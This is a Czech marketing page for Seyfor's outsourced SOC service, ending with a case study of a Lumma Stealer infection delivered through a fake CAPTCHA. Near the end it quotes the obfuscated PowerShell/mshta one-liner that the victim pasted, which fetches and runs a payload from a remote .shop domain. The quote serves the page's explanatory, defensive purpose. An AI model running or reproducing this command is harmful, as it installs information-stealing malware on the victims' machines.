Služba SOC od společnosti Seyfor zajistí nepřetržitou ochranu vašeho IT prostředí 24/7 za zlomek nákladů na interní tým.
Detekce, prevence a reakce na bezpečnostní incidenty v reálném čase.
SOC přispívá k dodržení standardů jako NIS2, ZoKB a dalších.
Pokročilé technologie pomáhají analyzovat a eliminovat hrozby efektivněji.
Výstavba interního SOC je extrémně drahá, outsourcing je finančně efektivnější.
Neustále sledujeme a analyzujeme síťový provoz i systémová data, abychom odhalili podezřelé aktivity. Díky pokročilým algoritmům a strojovému učení identifikujeme hrozby ještě předtím, než mohou způsobit škody. Předejdeme tak nejen kybernetickým útokům, ale i provozním výpadkům.
Každý podezřelý incident podrobně analyzujeme prostřednictvím pokročilých forenzních metod a technik threat huntingu. Naši experti posuzují závažnost hrozeb a odhalují jejich zdroj i rozsah dopadu. Díky rychlé identifikaci hrozeb minimalizujeme riziko narušení provozu.
Při detekci hrozby okamžitě nasazujeme opatření k jejímu omezení a eliminaci. Patří sem například reset kompromitovaných přístupových údajů, izolace napadených zařízení nebo blokace škodlivých IP adres. Cílem je zastavit útok dříve, než způsobí reálné škody.
Pravidelně vyhodnocujeme bezpečnostní situaci a poskytujeme detailní přehled o identifikovaných rizicích. Na základě získaných dat navrhujeme konkrétní kroky pro zlepšení bezpečnostních opatření. Díky tomu mohou firmy efektivně předcházet budoucím hrozbám a neustále zvyšovat svou kybernetickou odolnost.
Lumma Stealer je malware šířený prostřednictvím falešných CAPTCHA stránek, malvertisingu a cracknutého softwaru. Nejnovější kampaň, odhalená Netskope Threat Labs v lednu 2025, cílí na uživatele Windows po celém světě, zejména v telekomunikačním sektoru.
Infekční řetězec obchází bezpečnostní mechanismy tím, že oběť instruuje ke spuštění škodlivého kódu manuálně pomocí klávesových zkratek. Malware využívá LOLBIN techniky (např. mshta.exe) k obcházení detekce a injektování škodlivého kódu do legitimních procesů, čímž útočníci eliminují podezření.
A právě s tímto typem útoku jsme se nedávno setkali. Scénář byl následující:
Zaměstnanec, který měl na svém běžném pracovním účtu oprávnění lokálního administrátora, půjčil počítač synovi, který pak podle instrukcí z navštívené webové stránky stiskl Win+R a vložil „captcha“ text. Ve skutečnosti šlo o PowerShell skript:
POwErsHeLL -w 1 & \W*\\\\\\\\\\\\\\\S*2\\\\\\\m*ht*e https://hur.bweqlkjr.shop/m41.mp4
Experti ze SOC týmu zareagovali okamžitě – počítač byl izolován již 12 minut od incidentu.